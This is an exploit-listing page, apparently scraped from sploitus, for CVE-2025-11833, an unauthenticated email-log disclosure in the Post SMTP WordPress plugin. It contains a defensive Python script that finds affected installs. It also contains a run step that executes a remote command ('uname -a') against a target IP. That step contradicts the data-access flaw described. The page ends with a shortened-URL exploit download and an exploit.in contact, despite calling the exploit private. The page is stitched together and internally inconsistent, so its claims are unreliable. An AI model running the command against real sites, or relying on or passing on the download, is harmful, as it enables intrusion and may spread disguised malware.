## https://sploitus.com/exploit?id=7839D112-DA3A-5B75-80EA-B4847E0F3FFB
# Unauthorized Data Access in Post SMTP Plugin for WordPress (CVE-2025-11833)
## Overview
A vulnerability in the Post SMTP WordPress plugin affects versions up to and including 3.6.0. The issue stems from a missing capability check in the `__construct` function, which allows unauthorized access to email logs.
## Details
- **CVE ID**: [CVE-2025-11833](https://nvd.nist.gov/vuln/detail/CVE-2025-11833)
- **Discovered**: 2025-11-1
- **Published**: 2025-11-1
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Unauthenticated attackers can read arbitrary emails logged by the Post SMTP plugin, including sensitive password reset emails. This could lead to complete account takeover, as attackers might intercept and use password reset links. The vulnerability has a CVSS score of 9.8, indicating a critical severity with high confidentiality, integrity, and availability impacts.
## Affected Versions
**Post SMTP:**
- all versions up to and including 3.6.0
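
The following inventory check is an added example, not code from the original page or from the plugin. It scans a WordPress `wp-content/plugins` directory and reports Post SMTP installs at or below 3.6.0. The match on a plugin header name containing "Post SMTP" is an assumption, and the sample directories and version strings are constructed.

```python
import re
import tempfile
from pathlib import Path

LAST_AFFECTED = (3, 6, 0)  # from the advisory: up to and including 3.6.0
NAME_MATCH = "post smtp"   # assumption: the plugin header name contains this
HEADER_RE = re.compile(
    r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)[ \t\r]*$", re.I | re.M)


def read_plugin_header(php_file: Path) -> dict:
    """Return the plugin header fields found in the first 8 KiB of a file."""
    head = php_file.read_bytes()[:8192].decode("utf-8", errors="replace")
    fields = {}
    for key, value in HEADER_RE.findall(head):
        fields.setdefault(key.lower(), value)  # first occurrence wins
    return fields


def parse_version(text: str) -> tuple:
    """Turn '3.6' or '3.6.0-beta' into a comparable 3-tuple of ints.

    A string with no digits becomes (0, 0, 0), so it is reported, not skipped.
    """
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def find_affected(plugins_dir: Path) -> list:
    """List (directory, version) for Post SMTP installs at or below 3.6.0."""
    hits = []
    for php_file in sorted(plugins_dir.glob("*/*.php")):
        fields = read_plugin_header(php_file)
        name, version = fields.get("plugin name", ""), fields.get("version")
        if NAME_MATCH in name.lower() and version \
                and parse_version(version) <= LAST_AFFECTED:
            hits.append((php_file.parent.name, version))
    return hits


def demo() -> list:
    """Scan a constructed plugins tree (names and versions are made up)."""
    samples = [("a-old", "Post SMTP", "3.5.2"), ("b-edge", "Post SMTP", "3.6"),
               ("c-new", "Post SMTP", "9.9.9"), ("d-other", "Some Form", "1.0")]
    with tempfile.TemporaryDirectory() as tmp:
        for slug, name, ver in samples:
            (Path(tmp) / slug).mkdir()
            (Path(tmp) / slug / "main.php").write_text(
                f"<?php\n/**\n * Plugin Name: {name}\n * Version: {ver}\n */\n")
        return find_affected(Path(tmp))
```

Point `find_affected` at the real `wp-content/plugins` path of each site to build the list of installs that need updating.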
## Running
To run the exploit, you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **nullstatics@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/yh4ucr8e)